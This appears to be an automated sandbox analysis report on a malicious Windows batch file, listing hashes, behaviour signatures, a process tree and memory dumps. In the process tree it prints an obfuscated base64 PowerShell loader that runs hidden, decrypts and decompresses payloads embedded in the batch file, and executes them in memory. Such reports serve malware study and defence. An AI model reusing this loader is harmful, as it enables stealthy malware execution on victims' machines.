7d69e0d82e74059115486fae5dd5ac6463c7fccd91dbbcaa9587117c7d201ddb

Resubmissions

22-04-2024 22:02

240422-1xtwbagh68 10

22-04-2024 19:25

240422-x42b7afa68 10

19-04-2024 03:02

240419-djmthsfh8w 10

Analysis

max time kernel
122s
max time network
144s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
19-04-2024 03:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat
Size

1.1MB
MD5

4030841f8cd4b3ac37ab0a0b9332f3a5
SHA1

6d05584de372399fbadd59a1e6a1eefee90f8725
SHA256

10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1
SHA512

a8c40c3fa3f7f9ba47eed94a55a2562719073fd568d4aa96a081a46ce150e0b068b453e812eaef3fe15cafae3b66127e23ed4d72669173c8c254ba58d32534c0
SSDEEP

24576:+NAwcGqisVN8rXpLOnM+YCftp99Jj9Pgxp1QrKDI:+NKVVsxmt9j

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2996 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2996 powershell.exe

pid	process
2996	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2996	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2336 wrote to memory of 1776	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 1776	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 1776	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2920	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2920	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2920	2336	cmd.exe	cmd.exe
PID 2920 wrote to memory of 2992	2920	cmd.exe	cmd.exe
PID 2920 wrote to memory of 2992	2920	cmd.exe	cmd.exe
PID 2920 wrote to memory of 2992	2920	cmd.exe	cmd.exe
PID 2920 wrote to memory of 1564	2920	cmd.exe	cmd.exe
PID 2920 wrote to memory of 1564	2920	cmd.exe	cmd.exe
PID 2920 wrote to memory of 1564	2920	cmd.exe	cmd.exe
PID 2920 wrote to memory of 2996	2920	cmd.exe	powershell.exe
PID 2920 wrote to memory of 2996	2920	cmd.exe	powershell.exe
PID 2920 wrote to memory of 2996	2920	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\system32\cmd.exe
  cmd /c \"set __=^&rem\
  2⤵
  PID:1776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24ga1JGT2soJERNSmFHKXskUXpwdGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFF6cHRlLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskUXpwdGUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRRenB0ZS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRjB3NXFsREI3QUlVTmtQVG5CWTBQeUVod2ppZzM0Zm1wb3I5S2ZqeWtvYz0nKTskUXpwdGUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZHJXWWdZV3ptMEhxQjA1ZHpyck1Ddz09Jyk7JGRHR2VBPSRRenB0ZS5DcmVhdGVEZWNyeXB0b3IoKTskT2tGeWU9JGRHR2VBLlRyYW5zZm9ybUZpbmFsQmxvY2soJERNSmFHLDAsJERNSmFHLkxlbmd0aCk7JGRHR2VBLkRpc3Bvc2UoKTskUXpwdGUuRGlzcG9zZSgpOyRPa0Z5ZTt9ZnVuY3Rpb24gbEZOSHYoJERNSmFHKXskUHZ3WXc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkRE1KYUcpOyRiYW9EZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JGxYcUJ3PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFB2d1l3LFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbFhxQncuQ29weVRvKCRiYW9EZCk7JGxYcUJ3LkRpc3Bvc2UoKTskUHZ3WXcuRGlzcG9zZSgpOyRiYW9EZC5EaXNwb3NlKCk7JGJhb0RkLlRvQXJyYXkoKTt9JHJydUhvPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskeGJuQW09bEZOSHYgKGtSRk9rIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHJydUhvLCA1KS5TdWJzdHJpbmcoMikpKSk7JE9NU3hJPWxGTkh2IChrUkZPayAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRycnVIbywgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kT01TeEkpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHhibkFtKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
    3⤵
    PID:1564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2996

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2996-4-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2996-6-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-7-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2996-5-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2996-8-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-9-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2996-10-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2996-11-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-12-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2996-13-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2996-14-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download